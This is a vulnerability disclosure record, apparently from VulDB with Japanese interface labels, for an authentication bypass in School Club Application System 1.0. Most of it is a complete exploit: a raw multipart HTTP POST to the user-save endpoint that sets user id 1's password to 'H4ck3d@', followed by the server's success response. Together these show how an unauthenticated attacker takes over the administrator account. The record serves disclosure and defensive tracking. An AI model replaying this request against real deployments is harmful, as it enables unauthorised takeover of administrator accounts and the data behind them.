提出 #34399: School Club Application System (SCAS) 1.0 - Authentication Bypass
| タイトル | School Club Application System (SCAS) 1.0 - Authentication Bypass |
|---|---|
| 説明 | # Exploit Title: School Club Application System (SCAS) 1.0 - Authentication Bypass # Date: 2022-04-09 # Exploit Author: Mr Empy # Software Link: https://www.sourcecodester.com/php/15266/school-club-application-system-phpoop-free-source-code.html # Version: 1.0 # Tested on: Linux Title: ================ School Club Application System (SCAS) 1.0 - Authentication Bypass Summary: ================ School Club Application System (SCAS) in version 1.0 is vulnerable to bypass authentication by changing administrator password by insecure direct object reference (IDOR) attack, for this reason, attacker can gain full access to administrator account by resetting its password. Severity Level: ================ 6.5 (Medium) CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N Affected Product: ================ School Club Application System v1.0 Steps to Reproduce: ================ Request: POST /scas/classes/Users.php?f=save_user HTTP/1.1 Host: target.com Content-Length: 785 Accept: application/json, text/javascript, */*; q=0.01 X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryOJM0GBfl6KS1ELuA Origin: http://target.com Referer: http://target.com/scas/admin/?page=manage_account Accept-Encoding: gzip, deflate Accept-Language: pt-PT,pt;q=0.9,en-US;q=0.8,en;q=0.7 Connection: close ------WebKitFormBoundaryOJM0GBfl6KS1ELuA Content-Disposition: form-data; name="id" 1 ------WebKitFormBoundaryOJM0GBfl6KS1ELuA Content-Disposition: form-data; name="firstname" Administrator ------WebKitFormBoundaryOJM0GBfl6KS1ELuA Content-Disposition: form-data; name="middlename" ------WebKitFormBoundaryOJM0GBfl6KS1ELuA Content-Disposition: form-data; name="lastname" Admin ------WebKitFormBoundaryOJM0GBfl6KS1ELuA Content-Disposition: form-data; name="username" admin ------WebKitFormBoundaryOJM0GBfl6KS1ELuA Content-Disposition: form-data; name="password" H4ck3d@ ------WebKitFormBoundaryOJM0GBfl6KS1ELuA Content-Disposition: form-data; name="image"; filename="" Content-Type: application/octet-stream ------WebKitFormBoundaryOJM0GBfl6KS1ELuA-- Response: HTTP/1.1 200 OK Date: Sat, 09 Apr 2022 15:16:38 GMT Server: Apache/2.4.52 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Content-Length: 20 Connection: close Content-Type: text/html; charset=UTF-8 {"status":"success"} |
| ソース | ⚠️ https:/ |
| ユーザー | mrempy (UID 24379) |
| 送信 | 2022年04月09日 17:32 (4 年 ago) |
| モデレーション | 2022年04月09日 20:16 (3 hours later) |
| ステータス | 承諾済み |
| VulDBエントリ | 196750 [School Club Application System 1.0 Users.php?f=save_user 特権昇格] |
| ポイント | 20 |